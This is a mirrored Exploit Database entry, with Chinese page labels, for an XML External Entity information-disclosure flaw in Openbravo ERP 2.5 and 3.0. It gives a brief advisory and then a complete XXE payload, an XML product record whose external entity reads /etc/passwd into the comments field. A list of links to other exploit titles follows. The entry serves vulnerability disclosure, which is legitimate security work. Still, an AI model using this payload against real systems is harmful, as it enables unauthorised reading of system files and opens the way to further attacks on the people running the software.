Openbravo ERP – XML External Entity Information Disclosure

Exploit Database
13 阅读

作者： Tod Beardsley

日期： 2013-10-30
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/38818/

source: https://www.securityfocus.com/bid/63431/info

Openbravo ERP is prone to an information-disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.

Openbravo ERP 2.5 and 3.0 are vulnerable. 

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
 <!ELEMENT comments ANY >
 <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>

<ob:Openbravo xmlns:ob="http://www.example.com"
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
<Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
<id>C970393BDF6C43E2B030D23482D88EED</id>
<comments>&xxe;</comments>
</Product>
</ob:Openbravo>

last Exploits
Openbravo ERP – XML External Entity Information Disclosure的更多信息

Ulterius Server < 1.9.5.0 - Directory Traversal：
Perl 5.x – ‘lc()’ / ‘uc()’ TAINT Mode Protection Security Bypass：
Adobe Flash Player 11.3 – Font Parsing Code Execution (Metasploit)：
Belkin Wireless Router – Default WPS PIN Security：
RKD Software BarCode ActiveX Control ‘BarCodeAx.dll’ 4.9 – Remote Stack Buffer Overflow (Metasploit)：
Apache Axis 1.4 – Remote Code Execution：
HP VAN SDN Controller – Root Command Injection (Metasploit)：
Microsoft Word 16.72.23040900 – Remote Code Execution (RCE)：